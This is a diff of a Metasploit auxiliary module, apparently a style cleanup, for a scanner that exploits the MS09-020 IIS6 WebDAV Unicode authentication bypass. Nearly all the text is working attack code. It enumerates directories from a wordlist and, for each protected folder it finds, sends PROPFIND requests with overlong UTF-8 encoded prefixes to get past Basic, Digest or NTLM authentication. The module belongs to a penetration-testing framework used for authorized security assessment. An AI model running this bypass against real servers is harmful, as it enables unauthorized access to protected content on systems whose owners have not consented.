@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::WmapScanDir
@@ -12,46 +10,55 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'   		=> 'MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner',
-      'Description'	=> %q{
-        This module is based on et's HTTP Directory Scanner module,
-        with one exception. Where authentication is required, it attempts
-        to bypass authentication using the WebDAV IIS6 Unicode vulnerability
-        discovered by Kingcope. The vulnerability appears to be exploitable
-        where WebDAV is enabled on the IIS6 server, and any protected folder
-        requires either Basic, Digest or NTLM authentication.
-      },
-      'Author' 		=> [ 'aushack' ],
-      'License'		=> MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner',
+        'Description'	=> %q{
+          This module is based on et's HTTP Directory Scanner module,
+          with one exception. Where authentication is required, it attempts
+          to bypass authentication using the WebDAV IIS6 Unicode vulnerability
+          discovered by Kingcope. The vulnerability appears to be exploitable
+          where WebDAV is enabled on the IIS6 server, and any protected folder
+          requires either Basic, Digest or NTLM authentication.
+        },
+        'Author' => [ 'aushack' ],
+        'License'	=> MSF_LICENSE,
+        'References' => [
           [ 'MSB', 'MS09-020' ],
           [ 'CVE', '2009-1535' ],
           [ 'CVE', '2009-1122' ],
           [ 'OSVDB', '54555' ],
           [ 'BID', '34993' ],
-        ]))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
-        OptString.new('PATH', [ true,  "The path to identify files", '/']),
+        OptString.new('PATH', [ true, "The path to identify files", '/']),
         OptInt.new('ERROR_CODE', [ true, "Error code for non existent directory", 404]),
-        OptPath.new('DICTIONARY',   [ false, "Path of word dictionary to use",
-            File.join(Msf::Config.data_directory, "wmap", "wmap_dirs.txt")
-          ]
-        ),
-        OptPath.new('HTTP404S',   [ false, "Path of 404 signatures to use",
-            File.join(Msf::Config.data_directory, "wmap", "wmap_404s.txt")
-          ]
-        )
-      ])
+        OptPath.new('DICTIONARY', [
+          false, "Path of word dictionary to use",
+          File.join(Msf::Config.data_directory, "wmap", "wmap_dirs.txt")
+        ]),
+        OptPath.new('HTTP404S', [
+          false, "Path of 404 signatures to use",
+          File.join(Msf::Config.data_directory, "wmap", "wmap_404s.txt")
+        ])
+      ]
+    )
 
     register_advanced_options(
       [
         OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
-      ])
-
+      ]
+    )
   end
 
   def run_host(ip)
@@ -60,14 +67,13 @@ class MetasploitModule < Msf::Auxiliary
     emesg = nil
 
     tpath = normalize_uri(datastore['PATH'])
-    if tpath[-1,1] != '/'
+    if tpath[-1, 1] != '/'
       tpath += '/'
     end
 
     ecode = datastore['ERROR_CODE'].to_i
     vhost = datastore['VHOST'] || wmap_target_host
-    prot  = datastore['SSL'] ? 'https' : 'http'
-
+    prot = datastore['SSL'] ? 'https' : 'http'
 
     #
     # Detect error code
@@ -75,29 +81,28 @@ class MetasploitModule < Msf::Auxiliary
     begin
       randdir = Rex::Text.rand_text_alpha(5).chomp + '/'
       res = send_request_cgi({
-        'uri'  		=>  tpath+randdir,
-        'method'   	=> 'GET',
-        'ctype'		=> 'text/html'
+        'uri' => tpath + randdir,
+        'method' => 'GET',
+        'ctype'	=> 'text/html'
       }, 20)
 
       return if not res
 
       tcode = res.code.to_i
 
-
       # Look for a string we can signature on as well
-      if(tcode >= 200 and tcode <= 299)
+      if (tcode >= 200 and tcode <= 299)
 
         File.open(datastore['HTTP404S'], 'rb').each do |str|
-          if(res.body.index(str))
+          if (res.body.index(str))
             emesg = str
             break
           end
         end
 
-        if(not emesg)
+        if (not emesg)
           print_status("Using first 256 bytes of the response as 404 string")
-          emesg = res.body[0,256]
+          emesg = res.body[0, 256]
         else
           print_status("Using custom 404 string of '#{emesg}'")
         end
@@ -105,8 +110,6 @@ class MetasploitModule < Msf::Auxiliary
         ecode = tcode
         print_status("Using code '#{ecode}' as not found.")
       end
-
-
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
       conn = false
     rescue ::Timeout::Error, ::Errno::EPIPE
@@ -115,24 +118,22 @@ class MetasploitModule < Msf::Auxiliary
     return if not conn
 
     webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
-      '<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
-      '<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
+                 '<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
+                 '<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
 
     File.open(datastore['DICTIONARY'], 'rb').each do |testf|
       begin
         testfdir = testf.chomp + '/'
         res = send_request_cgi({
-          'uri'  		=>  tpath + testfdir,
-          'method'   	=> 'PROPFIND',
-          'ctype'		=> 'application/xml',
-          'headers' 	=>
-            {
-            },
-          'data'		=> webdav_req + "\r\n\r\n",
+          'uri' => tpath + testfdir,
+          'method' => 'PROPFIND',
+          'ctype'	=> 'application/xml',
+          'headers' =>
+            {},
+          'data'	=> webdav_req + "\r\n\r\n",
         }, 20)
 
-
-        if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
+        if (not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
           if !datastore['NoDetailMessages']
             print_status("NOT Found #{wmap_base_url}#{tpath}#{testfdir} #{res.code} (#{wmap_target_host})")
           end
@@ -140,23 +141,23 @@ class MetasploitModule < Msf::Auxiliary
           print_status("Found protected folder #{wmap_base_url}#{tpath}#{testfdir} #{res.code} (#{wmap_target_host})")
           print_status("\tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.")
 
-          cset  = %W{ & ^ % $ # @ ! }
-          buff  = ''
-          blen  = rand(16)+1
-          while(buff.length < blen)
-            buff << cset[ rand(cset.length) ]
+          cset = %W{& ^ % $ # @ !}
+          buff = ''
+          blen = rand(16) + 1
+          while (buff.length < blen)
+            buff << cset[rand(cset.length)]
           end
-          bogus = Rex::Text.uri_encode(Rex::Text.to_unicode( buff, 'utf-8', 'overlong', 2))
+          bogus = Rex::Text.uri_encode(Rex::Text.to_unicode(buff, 'utf-8', 'overlong', 2))
 
           res = send_request_cgi({
-            'uri'  		=>  tpath + bogus + testfdir,
-            'method'   	=> 'PROPFIND',
-            'ctype'		=> 'application/xml',
-            'headers' 	=>
+            'uri' => tpath + bogus + testfdir,
+            'method' => 'PROPFIND',
+            'ctype'	=> 'application/xml',
+            'headers' =>
               {
-                #'Translate'	 => 'f', # Not required in PROPFIND, only GET - aushack 20091518
+                # 'Translate'	 => 'f', # Not required in PROPFIND, only GET - aushack 20091518
               },
-            'data'		=> webdav_req + "\r\n\r\n",
+            'data'	=> webdav_req + "\r\n\r\n",
           }, 20)
 
           if (res and res.code.to_i == 207)
@@ -180,11 +181,9 @@ class MetasploitModule < Msf::Auxiliary
 
           end
         end
-
       rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
       rescue ::Timeout::Error, ::Errno::EPIPE
       end
     end
-
   end
 end
